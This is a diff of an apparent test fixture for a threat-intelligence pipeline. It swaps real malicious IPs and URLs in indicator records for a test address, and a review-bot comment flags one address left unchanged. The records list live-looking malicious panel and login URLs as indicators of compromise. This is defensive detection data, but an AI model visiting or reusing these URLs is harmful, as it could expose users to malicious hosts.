CyberCrime\",\"id\":\"indicator--6311f539-1d5d-423f-a238-d0c1dc167432\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-24T02:58:39.465Z\",\"name\":\"mal_url: http://lf4e4abf.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lf4e4abf.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:39.465Z\"}", "category": "threat", "type": "indicator", 
@@ -3255,7 +3255,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 206.217.131.245", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-01-24T02:59:02.031Z", "valid_from": "2020-01-24T02:59:02.031Z", @@ -3277,12 +3277,12 @@ "first_seen": "2020-01-24T02:59:02.031Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "206.217.131.245" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385359088Z", - "original": "{\"created\":\"2020-01-24T02:59:02.031Z\",\"description\":\"TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--1c91f219-cfa6-44c7-a5ee-1c760489b43c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-24T02:59:02.031Z\",\"name\":\"mal_ip: 206.217.131.245\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '206.217.131.245']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:02.031Z\"}", + "ingested": "2021-12-13T08:38:40.022945400Z", + "original": "{\"created\":\"2020-01-24T02:59:02.031Z\",\"description\":\"TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--1c91f219-cfa6-44c7-a5ee-1c760489b43c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-24T02:59:02.031Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:02.031Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -3333,7 +3333,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385363366Z", + "ingested": "2021-12-13T08:38:40.022951800Z", "original": "{\"created\":\"2020-01-24T02:59:15.878Z\",\"description\":\"TS ID: 55250078010; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime\",\"id\":\"indicator--c58983e2-18fd-47b8-aab4-6c8a2e2dcb35\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-01-24T02:59:15.878Z\",\"name\":\"mal_url: http://67.215.224.101/a1/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://67.215.224.101/a1/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:15.878Z\"}", "category": "threat", "type": "indicator", @@ -3352,7 +3352,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 162.241.73.163", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", "modified": "2020-01-24T02:59:29.155Z", "valid_from": "2020-01-24T02:59:29.155Z", 
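Review bot: The indicator in the `-3333` hunk (TS ID 55250078010) still carries the public address 67.215.224.101 in its `event.original` (`"mal_url: http://67.215.224.101/a1/panel/admin.php"`) while only its `event.ingested` was regenerated, whereas every other IP-bearing indicator on this page was moved to 89.160.20.156. If the commit's stated intent is that all fixture IPs come from the supported test subset, the matching event in the pipeline test input file needs the same substitution and this expected file should then be regenerated rather than hand-edited. The `threat.indicator.url.*` fields for that document lie outside this hunk, so I cannot confirm from here whether they also keep the old address.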
@@ -3374,12 +3374,12 @@ "first_seen": "2020-01-24T02:59:29.155Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "162.241.73.163" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385367474Z", - "original": "{\"created\":\"2020-01-24T02:59:29.155Z\",\"description\":\"TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--1ab178a8-7991-4879-b9aa-8da49f40e92e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-01-24T02:59:29.155Z\",\"name\":\"mal_ip: 162.241.73.163\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '162.241.73.163']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:29.155Z\"}", + "ingested": "2021-12-13T08:38:40.022956800Z", + "original": "{\"created\":\"2020-01-24T02:59:29.155Z\",\"description\":\"TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--1ab178a8-7991-4879-b9aa-8da49f40e92e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-01-24T02:59:29.155Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:29.155Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -3429,7 +3429,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385371481Z", + "ingested": "2021-12-13T08:38:40.022962200Z", "original": "{\"created\":\"2020-01-24T02:59:50.233Z\",\"description\":\"TS ID: 55250078020; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--d5bdff38-6939-4a47-8e11-b910520565c4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-78\"],\"modified\":\"2020-01-24T02:59:50.233Z\",\"name\":\"mal_url: http://l60bdd58.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l60bdd58.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:50.233Z\"}", "category": "threat", "type": "indicator", @@ -3448,7 +3448,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://107.175.150.73/~giftioz/.azma/panel/admin.php", + "name": "mal_url: http://89.160.20.156/~giftioz/.azma/panel/admin.php", "description": "TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-01-24T02:59:50.255Z", "valid_from": "2020-01-24T02:59:50.255Z", 
@@ -3473,16 +3473,16 @@ "url": { "path": "/~giftioz/.azma/panel/admin.php", "extension": "php", - "original": "http://107.175.150.73/~giftioz/.azma/panel/admin.php", + "original": "http://89.160.20.156/~giftioz/.azma/panel/admin.php", "scheme": "http", - "domain": "107.175.150.73", - "full": "http://107.175.150.73/~giftioz/.azma/panel/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/~giftioz/.azma/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385375699Z", - "original": "{\"created\":\"2020-01-24T02:59:50.255Z\",\"description\":\"TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--1be74977-5aa6-4175-99dd-32b54863a06b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-25\"],\"modified\":\"2020-01-24T02:59:50.255Z\",\"name\":\"mal_url: http://107.175.150.73/~giftioz/.azma/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://107.175.150.73/~giftioz/.azma/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:50.255Z\"}", + "ingested": "2021-12-13T08:38:40.022966700Z", + "original": "{\"created\":\"2020-01-24T02:59:50.255Z\",\"description\":\"TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--1be74977-5aa6-4175-99dd-32b54863a06b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-25\"],\"modified\":\"2020-01-24T02:59:50.255Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.azma/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.azma/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:50.255Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -3500,7 +3500,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.188.60.52/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-01-24T02:59:52.536Z", "valid_from": "2020-01-24T02:59:52.536Z", 
@@ -3524,16 +3524,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://5.188.60.52/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "5.188.60.52", - "full": "http://5.188.60.52/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385380168Z", - "original": "{\"created\":\"2020-01-24T02:59:52.536Z\",\"description\":\"TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--eacc25ce-584c-4b40-98ab-7935dabd5cb1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-78\"],\"modified\":\"2020-01-24T02:59:52.536Z\",\"name\":\"mal_url: http://5.188.60.52/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.188.60.52/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:52.536Z\"}", + "ingested": "2021-12-13T08:38:40.022970800Z", + "original": "{\"created\":\"2020-01-24T02:59:52.536Z\",\"description\":\"TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--eacc25ce-584c-4b40-98ab-7935dabd5cb1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-78\"],\"modified\":\"2020-01-24T02:59:52.536Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:52.536Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -3583,7 +3583,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385384516Z", + "ingested": "2021-12-13T08:38:40.022975Z", "original": "{\"created\":\"2020-01-24T02:59:54.784Z\",\"description\":\"TS ID: 55250078025; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--504f4011-eaea-4921-aad5-f102bef7c798\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-24T02:59:54.784Z\",\"name\":\"mal_url: http://trotdeiman.ga/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trotdeiman.ga/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:54.784Z\"}", "category": "threat", "type": "indicator", @@ -3602,7 +3602,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 217.8.117.8", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-01-24T02:59:54.815Z", "valid_from": "2020-01-24T02:59:54.815Z", 
@@ -3624,12 +3624,12 @@ "first_seen": "2020-01-24T02:59:54.815Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "217.8.117.8" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385389866Z", - "original": "{\"created\":\"2020-01-24T02:59:54.815Z\",\"description\":\"TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--e3ffb953-6c59-461a-8242-0d26c2b5c358\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:59:54.815Z\",\"name\":\"mal_ip: 217.8.117.8\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '217.8.117.8']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:54.815Z\"}", + "ingested": "2021-12-13T08:38:40.022978700Z", + "original": "{\"created\":\"2020-01-24T02:59:54.815Z\",\"description\":\"TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--e3ffb953-6c59-461a-8242-0d26c2b5c358\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:59:54.815Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:54.815Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3647,7 +3647,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 104.223.170.113", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime", "modified": "2020-01-24T03:00:01.726Z", "valid_from": "2020-01-24T03:00:01.726Z", 
@@ -3669,12 +3669,12 @@ "first_seen": "2020-01-24T03:00:01.726Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "104.223.170.113" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385394264Z", - "original": "{\"created\":\"2020-01-24T03:00:01.726Z\",\"description\":\"TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--3a47ad46-930d-4ced-b0e7-dc9d0776153e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T03:00:01.726Z\",\"name\":\"mal_ip: 104.223.170.113\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '104.223.170.113']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:01.726Z\"}", + "ingested": "2021-12-13T08:38:40.022983900Z", + "original": "{\"created\":\"2020-01-24T03:00:01.726Z\",\"description\":\"TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--3a47ad46-930d-4ced-b0e7-dc9d0776153e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T03:00:01.726Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:01.726Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -3725,7 +3725,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385398512Z", + "ingested": "2021-12-13T08:38:40.022991700Z", "original": "{\"created\":\"2020-01-24T03:00:01.762Z\",\"description\":\"TS ID: 55250078011; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--0e10924c-745c-4a58-8e27-ab3a6bacd666\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-01-24T03:00:01.762Z\",\"name\":\"mal_url: http://tavim.org/includes/firmino/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tavim.org/includes/firmino/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:01.762Z\"}", "category": "threat", "type": "indicator", @@ -3776,7 +3776,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385403081Z", + "ingested": "2021-12-13T08:38:40.022999400Z", "original": "{\"created\":\"2020-01-24T03:00:10.928Z\",\"description\":\"TS ID: 55250078015; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--c3fb816a-cc3b-4442-be4d-d62113ae5168\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-24T03:00:10.928Z\",\"name\":\"mal_url: http://onlinesecuritycenter.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://onlinesecuritycenter.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:10.928Z\"}", "category": "threat", "type": "indicator", 
@@ -3828,7 +3828,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385407329Z", + "ingested": "2021-12-13T08:38:40.023006700Z", "original": "{\"created\":\"2020-01-24T03:00:20.166Z\",\"description\":\"TS ID: 55250078029; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--9159e46d-f3a4-464b-ac68-8beaf87e1a8f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-24T03:00:20.166Z\",\"name\":\"mal_url: http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:20.166Z\"}", "category": "threat", "type": "indicator", @@ -3879,7 +3879,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385411527Z", + "ingested": "2021-12-13T08:38:40.023014300Z", "original": "{\"created\":\"2020-01-24T03:00:24.048Z\",\"description\":\"TS ID: 55250078016; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fefa8e76-ae0f-41ab-84e7-ea43ab055573\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-24T03:00:24.048Z\",\"name\":\"mal_url: http://jumbajumbadun.fun/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jumbajumbadun.fun/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:24.048Z\"}", "category": "threat", "type": "indicator", 
@@ -3931,7 +3931,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385416205Z", + "ingested": "2021-12-13T08:38:40.023021700Z", "original": "{\"created\":\"2020-01-24T03:00:55.816Z\",\"description\":\"TS ID: 55250078024; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--6a76fa89-4d5f-40d0-9b03-671bdb2d5b4b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-01-24T03:00:55.816Z\",\"name\":\"mal_url: http://tavim.org/includes/salah/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tavim.org/includes/salah/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:55.816Z\"}", "category": "threat", "type": "indicator", @@ -3982,7 +3982,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385420263Z", + "ingested": "2021-12-13T08:38:40.023026900Z", "original": "{\"created\":\"2020-01-24T03:01:10.501Z\",\"description\":\"TS ID: 55250078022; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--21055dfd-d0cb-42ec-93bd-ffaeadd11d80\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-24T03:01:10.501Z\",\"name\":\"mal_url: http://l0c23205.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l0c23205.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:01:10.501Z\"}", "category": "threat", "type": "indicator", 
@@ -4033,7 +4033,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385424691Z", + "ingested": "2021-12-13T08:38:40.023032900Z", "original": "{\"created\":\"2020-01-24T03:01:10.518Z\",\"description\":\"TS ID: 55250078021; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--7471a595-e8b0-4c41-be4c-0a3e55675630\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T03:01:10.518Z\",\"name\":\"mal_url: http://l535e9e5.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l535e9e5.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:01:10.518Z\"}", "category": "threat", "type": "indicator", @@ -4052,7 +4052,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 217.8.117.47", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-01-24T03:01:14.843Z", "valid_from": "2020-01-24T03:01:14.843Z", 
@@ -4074,12 +4074,12 @@ "first_seen": "2020-01-24T03:01:14.843Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "217.8.117.47" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385428949Z", - "original": "{\"created\":\"2020-01-24T03:01:14.843Z\",\"description\":\"TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--ead1e7e5-fdb3-47c2-9476-aa82741c038e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-24T03:01:14.843Z\",\"name\":\"mal_ip: 217.8.117.47\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '217.8.117.47']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:01:14.843Z\"}", + "ingested": "2021-12-13T08:38:40.023040600Z", + "original": "{\"created\":\"2020-01-24T03:01:14.843Z\",\"description\":\"TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--ead1e7e5-fdb3-47c2-9476-aa82741c038e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-24T03:01:14.843Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:01:14.843Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4097,7 +4097,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://46.161.27.57/northon/", + "name": "mal_url: http://89.160.20.156/northon/", "description": "TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime", "modified": "2020-01-25T02:57:12.699Z", "valid_from": "2020-01-25T02:57:12.699Z", 
@@ -4121,16 +4121,16 @@ "provider": "CyberCrime", "url": { "path": "/northon/", - "original": "http://46.161.27.57/northon/", + "original": "http://89.160.20.156/northon/", "scheme": "http", - "domain": "46.161.27.57", - "full": "http://46.161.27.57/northon/" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/northon/" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385433548Z", - "original": "{\"created\":\"2020-01-25T02:57:12.699Z\",\"description\":\"TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--b0aee6bf-32f4-4f65-8de6-f65e04e92b15\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-25T02:57:12.699Z\",\"name\":\"mal_url: http://46.161.27.57/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://46.161.27.57/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:12.699Z\"}", + "ingested": "2021-12-13T08:38:40.023048Z", + "original": "{\"created\":\"2020-01-25T02:57:12.699Z\",\"description\":\"TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--b0aee6bf-32f4-4f65-8de6-f65e04e92b15\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-25T02:57:12.699Z\",\"name\":\"mal_url: http://89.160.20.156/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:12.699Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -4148,7 +4148,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://104.168.99.170/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-01-25T02:57:28.034Z", "valid_from": "2020-01-25T02:57:28.034Z", 
@@ -4172,16 +4172,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://104.168.99.170/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "104.168.99.170", - "full": "http://104.168.99.170/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385437836Z", - "original": "{\"created\":\"2020-01-25T02:57:28.034Z\",\"description\":\"TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--54afbceb-72f3-484e-aee4-904f77beeff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-25T02:57:28.034Z\",\"name\":\"mal_url: http://104.168.99.170/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://104.168.99.170/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:28.034Z\"}", + "ingested": "2021-12-13T08:38:40.023054600Z", + "original": "{\"created\":\"2020-01-25T02:57:28.034Z\",\"description\":\"TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--54afbceb-72f3-484e-aee4-904f77beeff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-25T02:57:28.034Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:28.034Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -4232,7 +4232,7 @@
 }
 },
 "event": {
